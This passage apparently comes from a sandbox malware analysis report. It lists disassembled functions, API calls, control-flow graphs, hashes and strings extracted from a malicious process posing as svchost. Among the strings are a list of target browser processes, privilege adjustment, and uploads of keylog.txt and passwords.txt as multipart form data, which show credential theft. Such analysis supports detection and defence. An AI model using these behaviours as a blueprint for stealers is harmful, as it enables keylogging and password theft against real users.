                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000010,?,00000000), ref: 02657941
                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 02657948
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(0268FB80,?,00000000), ref: 02657977
                                                                                                                                                                                                                • Part of subcall function 02664880: OpenProcess.KERNEL32(00000400,00000000,00000000,00000000,00000000,76F90F00,?,?,?,?,?,?,?,?,02647F74), ref: 02664895
                                                                                                                                                                                                                • Part of subcall function 02664880: OpenProcessToken.ADVAPI32(00000000,00000018,?,?,?,?,?,?,?,?,?,02647F74), ref: 026648AC
                                                                                                                                                                                                                • Part of subcall function 02664880: GetTokenInformation.KERNELBASE(?,00000007(TokenIntegrityLevel),?,00000010,?,?,?,?,?,?,?,?,?,02647F74), ref: 026648CA
                                                                                                                                                                                                                • Part of subcall function 02664880: CharUpperA.USER32(?,?,?,?,?,?,?,?,?,02647F74), ref: 026648E2
                                                                                                                                                                                                                • Part of subcall function 02664880: GetHandleInformation.KERNEL32(?,00000000), ref: 0266493B
                                                                                                                                                                                                                • Part of subcall function 02664880: CloseHandle.KERNEL32(?), ref: 0266494C
                                                                                                                                                                                                                • Part of subcall function 02664880: GetHandleInformation.KERNEL32(00000000,?), ref: 0266495E
                                                                                                                                                                                                                • Part of subcall function 02664880: CloseHandle.KERNEL32(00000000), ref: 0266496F
                                                                                                                                                                                                              • Process32Next.KERNEL32(00000000,00000128), ref: 0265798B
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?,?,00000000), ref: 026579A5
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,00000000), ref: 026579B6
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex, xrefs: 02657912
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Handle$InformationProcess$Close$CriticalHeapOpenProcess32SectionToken$AllocateCharCreateCurrentEnterFirstLeaveNextSnapshotToolhelp32Upper
                                                                                                                                                                                                              • String ID: iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex
                                                                                                                                                                                                              • API String ID: 838372802-4199822264
                                                                                                                                                                                                              • Opcode ID: bdee22f7bd03bdbc5a09397ef9676baa2449de3d02c729d9adc966d87b88121f
                                                                                                                                                                                                              • Instruction ID: d4547c83204e5ff15d05f13958df52e3960fd1e88819ee0118ebf19baf5b7240
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bdee22f7bd03bdbc5a09397ef9676baa2449de3d02c729d9adc966d87b88121f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1631AE30941225AFE721DFA5CC48BAEBBB8FF49754F514598E84A93240DB709A81CBA0
                                                                                                                                                                                                              Function 026479E0 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 91threadstringnativeCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 026479FC
                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 02647A0F
                                                                                                                                                                                                                • Part of subcall function 02664880: OpenProcess.KERNEL32(00000400,00000000,00000000,00000000,00000000,76F90F00,?,?,?,?,?,?,?,?,02647F74), ref: 02664895
                                                                                                                                                                                                                • Part of subcall function 02664880: OpenProcessToken.ADVAPI32(00000000,00000018,?,?,?,?,?,?,?,?,?,02647F74), ref: 026648AC
                                                                                                                                                                                                                • Part of subcall function 02664880: GetTokenInformation.KERNELBASE(?,00000007(TokenIntegrityLevel),?,00000010,?,?,?,?,?,?,?,?,?,02647F74), ref: 026648CA
                                                                                                                                                                                                                • Part of subcall function 02664880: CharUpperA.USER32(?,?,?,?,?,?,?,?,?,02647F74), ref: 026648E2
                                                                                                                                                                                                                • Part of subcall function 02664880: GetHandleInformation.KERNEL32(?,00000000), ref: 0266493B
                                                                                                                                                                                                                • Part of subcall function 02664880: CloseHandle.KERNEL32(?), ref: 0266494C
                                                                                                                                                                                                                • Part of subcall function 02664880: GetHandleInformation.KERNEL32(00000000,?), ref: 0266495E
                                                                                                                                                                                                                • Part of subcall function 02664880: CloseHandle.KERNEL32(00000000), ref: 0266496F
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 02647A1E
                                                                                                                                                                                                              • GetThreadDesktop.USER32(00000000,00000002,?,00000100,?), ref: 02647A37
                                                                                                                                                                                                              • GetUserObjectInformationA.USER32(00000000), ref: 02647A3E
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,75775d6fa), ref: 02647A54
                                                                                                                                                                                                              • memset.MSVCRT ref: 02647A99
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02647AB3
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,?), ref: 02647AC6
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Information$Handle$OpenProcess$CloseCurrentThreadToken$CharDesktopMutexObjectQuerySystemUpperUser_snprintflstrcmpimemset
                                                                                                                                                                                                              • String ID: 75775d6fa$Global\HighMemoryEvent_%08x
                                                                                                                                                                                                              • API String ID: 1400009243-2133917647
                                                                                                                                                                                                              • Opcode ID: 87ee4c02411a615342f4f412f3663e4f31060488b47c2302ea0b2116b344966e
                                                                                                                                                                                                              • Instruction ID: 8bce666fe0ccdd3180e8d6511addc05d2d9bbdc001d10aa52d6133ccf604e701
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 87ee4c02411a615342f4f412f3663e4f31060488b47c2302ea0b2116b344966e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8431B471980219ABDB21CE50DC84FAEB76CFF44B11F45054AFE8597280EBB09AD4CBA1
                                                                                                                                                                                                              Function 02665930 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 54threadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentThread.KERNEL32 ref: 02665940
                                                                                                                                                                                                              • OpenThreadToken.ADVAPI32(00000000,?,?,?,?,02654D1B,?,?,00000000), ref: 02665947
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000020,02654D1B,?,?,?,?,02654D1B,?,?,00000000), ref: 02665957
                                                                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,02654D1B,?,?,00000000), ref: 0266595E
                                                                                                                                                                                                              • LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 02665981
                                                                                                                                                                                                              • AdjustTokenPrivileges.KERNELBASE(02654D1B,00000000,00000001,00000000,00000000,00000000), ref: 0266599B
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 026659A5
                                                                                                                                                                                                              • CloseHandle.KERNEL32(02654D1B), ref: 026659B6
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Token$CurrentOpenProcessThread$AdjustCloseErrorHandleLastLookupPrivilegePrivilegesValue
                                                                                                                                                                                                              • String ID: SeSecurityPrivilege
                                                                                                                                                                                                              • API String ID: 731831024-2333288578
                                                                                                                                                                                                              • Opcode ID: fda520745d00cf73535a3d7ceae4278d3dec3475d35e6a4a41af783693e08316
                                                                                                                                                                                                              • Instruction ID: a1a737847fd68231e997191e83f21432ad399c437c82caab8c88c25705402716
                                                                                                                                                                                                              • Opcode Fuzzy Hash: fda520745d00cf73535a3d7ceae4278d3dec3475d35e6a4a41af783693e08316
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 78115275A81204BBEB10EFE09C4EFBF7B7CEB04705F914658FA02E6180D770995487A1
                                                                                                                                                                                                              Function 02451360 Relevance: 3.2, APIs: 2, Instructions: 241memorylibraryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,61FF864A), ref: 02451451
                                                                                                                                                                                                              • LoadLibraryExA.KERNEL32(?,00000000,00000000,00000000,0AFB4677), ref: 02451515
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2611248672.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2450000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AllocLibraryLoadVirtual
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3550616410-0
                                                                                                                                                                                                              • Opcode ID: 4c20f65d22fef1470a76e602a17beb2500452f3e339ad4f3f34e1df76570f847
                                                                                                                                                                                                              • Instruction ID: ab5f6e62bc21964c910fae9b1e6b463a2d8355c4441086c9ca3b0938e52c4271
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4c20f65d22fef1470a76e602a17beb2500452f3e339ad4f3f34e1df76570f847
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 42914B71D00229AFCB20DFA9C840BAEB7B9AF88754F15455AEC4CB7706D734A901CF94
                                                                                                                                                                                                              Function 02644180 Relevance: 98.3, APIs: 42, Strings: 14, Instructions: 300memoryfilenetworkCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 451 2644180-26441aa GetProcessHeap HeapAlloc 452 26441bc-2644217 451->452 453 26441ac-26441b9 memset 451->453 454 26444c5-26444cb 452->454 455 264421d-264422d GetTcpTable 452->455 453->452 456 2644290-2644292 455->456 457 264422f-264423d GetProcessHeap HeapValidate 455->457 458 2644294-26442a2 GetProcessHeap HeapValidate 456->458 459 26442bd-26442cb 456->459 460 264423f-2644245 GetProcessHeap HeapFree 457->460 461 264424b-2644252 457->461 458->454 464 26442a8-26442ba GetProcessHeap HeapFree 458->464 465 2644370-264437d call 26541b0 459->465 466 26442d1-26442ea GetProcessHeap HeapAlloc 459->466 460->461 462 2644254-264426a GetProcessHeap HeapAlloc 461->462 463 2644278-264427d 461->463 462->463 467 264426c-2644275 memset 462->467 463->454 468 2644283-264428a GetTcpTable 463->468 466->465 470 26442f0-2644303 memset 466->470 467->463 468->456 472 2644305-264430d 470->472 472->472 473 264430f-2644319 472->473 474 264431f 473->474 475 264442a-264442d 473->475 477 2644322-264432f call 2644090 474->477 476 2644430-2644436 475->476 476->476 478 2644438-264444d 476->478 482 2644415-2644424 477->482 483 2644335-2644342 call 2644090 477->483 480 2644450-2644455 478->480 480->480 484 2644457-2644462 480->484 482->475 482->477 490 2644344-2644355 GetProcessHeap HeapValidate 483->490 491 2644380-2644382 483->491 486 2644464-264449d SetFilePointer LockFile WriteFile UnlockFile 484->486 487 26444a3-26444b7 GetProcessHeap HeapValidate 484->487 486->487 487->454 489 26444b9-26444bf GetProcessHeap HeapFree 487->489 489->454 490->482 492 264435b-264436b GetProcessHeap HeapFree 490->492 493 2644385-264438a 491->493 492->482 493->493 494 264438c-26443e5 htons * 2 _snprintf GetProcessHeap HeapValidate 493->494 495 26443e7-26443ed GetProcessHeap HeapFree 494->495 496 26443f3-2644404 GetProcessHeap HeapValidate 494->496 495->496 497 2644406-264440c GetProcessHeap HeapFree 496->497 498 2644412 496->498 497->498 498->482
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000C10,00000000,00000000,76F93490), ref: 0264419D
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 026441A0
                                                                                                                                                                                                              • memset.MSVCRT ref: 026441B4
                                                                                                                                                                                                              • GetTcpTable.IPHLPAPI(00000000,00000C00,00000001), ref: 02644224
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02644232
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02644235
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02644242
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02644245
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000BED), ref: 0264425D
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 02644260
                                                                                                                                                                                                              • memset.MSVCRT ref: 02644270
                                                                                                                                                                                                              • GetTcpTable.IPHLPAPI(00000000,00000C00,00000001), ref: 0264428A
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02644297
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 0264429A
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 026442AB
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 026442AE
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,-000000A9), ref: 026442DA
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 026442DD
                                                                                                                                                                                                              • memset.MSVCRT ref: 026442F4
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,00000000,?), ref: 02644346
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 0264434D
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0264435E
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02644365
                                                                                                                                                                                                              • htons.WS2_32(?), ref: 0264439D
                                                                                                                                                                                                              • htons.WS2_32(?), ref: 026443B0
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 026443C8
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 026443DA
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 026443DD
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 026443EA
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 026443ED
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 026443F9
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 026443FC
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02644409
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0264440C
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(026458F7,00000000,00000000,00000001), ref: 0264446E
                                                                                                                                                                                                              • LockFile.KERNEL32(026458F7,00000000,00000000,00000001,00000000), ref: 0264447E
                                                                                                                                                                                                              • WriteFile.KERNEL32(026458F7,00000000,00000001,00000000,00000000), ref: 0264448D
                                                                                                                                                                                                              • UnlockFile.KERNEL32(026458F7,026458F7,00000000,00000001,00000000), ref: 0264449D
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 026444AC
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 026444AF
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 026444BC
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 026444BF
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$FreeValidate$File$Allocmemset$Tablehtons$LockPointerUnlockWrite_snprintf
                                                                                                                                                                                                              • String ID: CLOSED$CLOSE_WAIT$CLOSING$DELETE_TCB$ESTAB$FIN_WAIT1$FIN_WAIT2$LAST_ACK$LISTEN$SYN_RCVD$SYN_SENT$TCP%s:%d%s:%d%s$TIME_WAIT$netstat{ProtoLocal addressRemote addressState
                                                                                                                                                                                                              • API String ID: 2439004899-2402783461
                                                                                                                                                                                                              • Opcode ID: fbb96a46a14fea72c1d3d78a56a00a4e95238e4fadeb39ea0de24ccd0e6e464a
                                                                                                                                                                                                              • Instruction ID: 623660b6bb127f9c1442b058ca2b1c7110960fb8f85055ad9f664ba71ee7951a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: fbb96a46a14fea72c1d3d78a56a00a4e95238e4fadeb39ea0de24ccd0e6e464a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 32A1D271E40205BBDB109FA19C9DFAF7F78EB85711F964608F946AB280DF709440CBA0
                                                                                                                                                                                                              Function 026539D0 Relevance: 86.4, APIs: 35, Strings: 14, Instructions: 640memoryfileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(0268FB68,76F90F00,00000000,76F92F00), ref: 026539E9
                                                                                                                                                                                                              • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 026539FB
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02653A1B
                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?), ref: 02653A2B
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(?), ref: 02653B00
                                                                                                                                                                                                              • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 02653B4C
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(?), ref: 02653B59
                                                                                                                                                                                                              • CopyFileA.KERNEL32(?,?,00000000), ref: 02653B9A
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(?), ref: 02653BCA
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000), ref: 02653C72
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 02653C7F
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 02653C85
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02653CA2
                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,00000104,00003000,00000004), ref: 02653CB9
                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?), ref: 02654076
                                                                                                                                                                                                              • PathFileExistsA.SHLWAPI(?), ref: 02654083
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000), ref: 02654096
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 026540A3
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 026540C7
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 026540CA
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 026540D6
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 026540D9
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 026540E7
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 026540EA
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 026540F6
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 026540F9
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(0268FB68), ref: 02654100
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$File$Path$Process$BackslashCurrentDirectory$AttributesCriticalDeleteFreeSectionValidate_snprintf$AllocCopyCountEnterExistsFolderLeaveTickVirtual
                                                                                                                                                                                                              • String ID: -----------------------------$%s%s$%s%u.zip$--$-----------------------------$4864fbb3d37ea29$7577580Fa$C:\Users\user\AppData\Roaming\$Content-Disposition: form-data; name="file"; filename="report"$Content-Disposition: form-data; name="pcname"$Content-Type: text/plain$DEBUG$keylog.txt$passwords.txt
                                                                                                                                                                                                              • API String ID: 2790020909-724247853
                                                                                                                                                                                                              • Opcode ID: 3d06e6f8260920d76ba90c32a92257212dc74051e97ea76084b7dc0de7226c42
                                                                                                                                                                                                              • Instruction ID: 187100a1c694c8afc250fb93d83d64eb8078bb232d28f0e53619220625e5bb6f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3d06e6f8260920d76ba90c32a92257212dc74051e97ea76084b7dc0de7226c42
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 66227D319042665BCF158F348CA4BFB7BB6AF45784F544AC4EC869B380EB32D999C790
                                                                                                                                                                                                              Function 02653BA4 Relevance: 67.0, APIs: 27, Strings: 11, Instructions: 477filememorystringCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 653 2653ba4-2653bab 654 2653bb0-2653bc1 653->654 654->654 655 2653bc3-2653bd2 PathAddBackslashA 654->655 656 2653bd3-2653bd9 655->656 656->656 657 2653bdb-2653c0a 656->657 659 2653c10-2653c14 657->659 660 2653c16-2653c18 659->660 661 2653c30-2653c32 659->661 663 2653c2c-2653c2e 660->663 664 2653c1a-2653c20 660->664 662 2653c35-2653c37 661->662 666 2653c85-2653cc3 GetTickCount _snprintf VirtualAlloc 662->666 667 2653c39-2653c3e 662->667 663->662 664->661 665 2653c22-2653c2a 664->665 665->659 665->663 668 265406f-265408b SetCurrentDirectoryA PathFileExistsA 666->668 669 2653cc9-2653cec lstrcpynA call 2669780 666->669 670 2653c40-2653c44 667->670 672 265408d-26540a3 SetFileAttributesA DeleteFileA 668->672 673 26540a9-26540bf 668->673 683 2653cfd-2653d44 VirtualFree call 2647680 SetFileAttributesA RemoveDirectoryA call 26478e0 669->683 684 2653cee-2653cf8 call 2669910 call 2669880 669->684 674 2653c46-2653c48 670->674 675 2653c60-2653c62 670->675 672->673 677 26540c1-26540ce GetProcessHeap HeapValidate 673->677 678 26540db-26540df 673->678 680 2653c5c-2653c5e 674->680 681 2653c4a-2653c50 674->681 679 2653c65-2653c67 675->679 677->678 685 26540d0-26540d9 GetProcessHeap HeapFree 677->685 686 26540e1-26540ee GetProcessHeap HeapValidate 678->686 687 26540fb-265410e LeaveCriticalSection 678->687 679->666 682 2653c69-2653c7f SetFileAttributesA DeleteFileA 679->682 680->679 681->675 688 2653c52-2653c5a 681->688 682->666 683->668 697 2653d4a-2653d4d 683->697 684->683 685->678 686->687 691 26540f0-26540f9 GetProcessHeap HeapFree 686->691 688->670 688->680 691->687 698 2653d50-2653d55 697->698 698->698 699 2653d57-2653d60 698->699 700 2653d62-2653d7c GetProcessHeap HeapAlloc 699->700 701 2653d8a-2653d8f 699->701 700->701 702 2653d7e-2653d87 memset 700->702 701->668 703 2653d95-2653dac 701->703 702->701 704 2653db0-2653db5 703->704 704->704 705 2653db7-2653dbc 704->705 706 2653dc0-2653dc6 705->706 706->706 707 2653dc8-2653dd9 706->707 708 2653de0-2653de6 707->708 708->708 709 2653de8-2653dfe 708->709 710 2653e00-2653e06 709->710 710->710 711 2653e08-2653e1b 710->711 712 2653e20-2653e25 711->712 712->712 713 2653e27-2653e2c 712->713 714 2653e30-2653e36 713->714 714->714 715 2653e38-2653e49 714->715 716 2653e50-2653e56 715->716 716->716 717 2653e58-2653e6a call 26432e0 716->717 720 2653e70-2653e75 717->720 720->720 721 2653e77-2653e7c 720->721 722 2653e80-2653e86 721->722 722->722 723 2653e88-2653e99 722->723 724 2653ea0-2653ea6 723->724 724->724 725 2653ea8-2653ebb 724->725 726 2653ec0-2653ec5 725->726 726->726 727 2653ec7-2653ecc 726->727 728 2653ed0-2653ed6 727->728 728->728 729 2653ed8-2653ee9 728->729 730 2653ef0-2653ef6 729->730 730->730 731 2653ef8-2653f0e 730->731 732 2653f10-2653f16 731->732 732->732 733 2653f18-2653f25 732->733 734 2653f28-2653f2e 733->734 734->734 735 2653f30-2653f40 734->735 736 2653f42-2653f47 735->736 736->736 737 2653f49-2653f4e 736->737 738 2653f50-2653f56 737->738 738->738 739 2653f58-2653f69 738->739 740 2653f70-2653f76 739->740 740->740 741 2653f78-2653f8b 740->741 742 2653f90-2653f95 741->742 742->742 743 2653f97-2653f9c 742->743 744 2653fa0-2653fa6 743->744 744->744 745 2653fa8-2653fb9 744->745 746 2653fc0-2653fc6 745->746 746->746 747 2653fc8-2653fdf 746->747 748 2653fe1-2653fe3 747->748 749 2653fe6-2653feb 748->749 749->749 750 2653fed-2653ff8 call 2653800 749->750 753 2654007-265400f 750->753 754 2653ffa-2654005 Sleep 750->754 755 2654011-2654015 753->755 754->748 754->753 756 2654017-2654019 755->756 757 2654031-2654033 755->757 758 265402d-265402f 756->758 759 265401b-2654021 756->759 760 2654036-2654038 757->760 758->760 759->757 761 2654023-265402b 759->761 760->668 762 265403a-265403f 760->762 761->755 761->758 763 2654041-2654045 762->763 764 2654047-2654049 763->764 765 2654061-2654063 763->765 766 265405d-265405f 764->766 767 265404b-2654051 764->767 768 2654066-2654068 765->768 766->768 767->765 769 2654053-265405b 767->769 768->668 770 265406a call 2643500 768->770 769->763 769->766 770->668
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(?), ref: 02653BCA
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000), ref: 02653C72
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 02653C7F
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 02653C85
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02653CA2
                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,00000104,00003000,00000004), ref: 02653CB9
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(00000000,?,00000104), ref: 02653CD6
                                                                                                                                                                                                              • VirtualFree.KERNELBASE(00000000,00000000,00008000,?), ref: 02653D05
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
